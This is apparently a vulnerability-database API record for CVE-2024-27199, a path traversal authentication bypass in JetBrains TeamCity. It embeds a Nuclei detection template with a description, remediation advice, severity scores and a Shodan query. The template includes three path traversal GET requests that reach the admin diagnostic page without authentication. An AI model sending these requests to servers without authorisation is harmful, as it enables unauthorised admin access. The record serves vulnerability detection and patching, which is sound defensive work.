{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-27199/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-27199/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-27199/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-27199/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-27199/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-27199"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-27199"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-27199.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-27199\n\ninfo:\n  name: TeamCity < 2023.11.4 - Authentication Bypass\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n  impact: |\n    Unauthenticated attackers can perform limited administrative actions on TeamCity servers via path traversal, potentially accessing sensitive build information.\n  remediation: |\n    Update JetBrains TeamCity to version 2023.11.4 or later.\n  reference:\n    - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-27199\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cwe-id: CWE-23\n    epss-score: 0.99991\n    epss-percentile: 0.99985\n    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    shodan-query: http.component:\"TeamCity\"\n    product: teamcity\n    vendor: jetbrains\n  tags: cve,cve2024,teamcity,jetbrains,auth-bypass,vkev,vuln,kev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/res/../admin/diagnostic.jsp\"\n      - \"{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp\"\n      - \"{{BaseURL}}/update/../admin/diagnostic.jsp\"\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"text/html\")'\n          - 'contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")'\n        condition: and\n# digest: 490a00463044022019d118552ab434b5ebbb42714dbf2fd0488d15c39ba21d05a57bf8c1c2a47093022062bd36c76245a5801b9693509ca401afcb8a292ce7fd57aa2807daf1e66936cb:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-27199"
}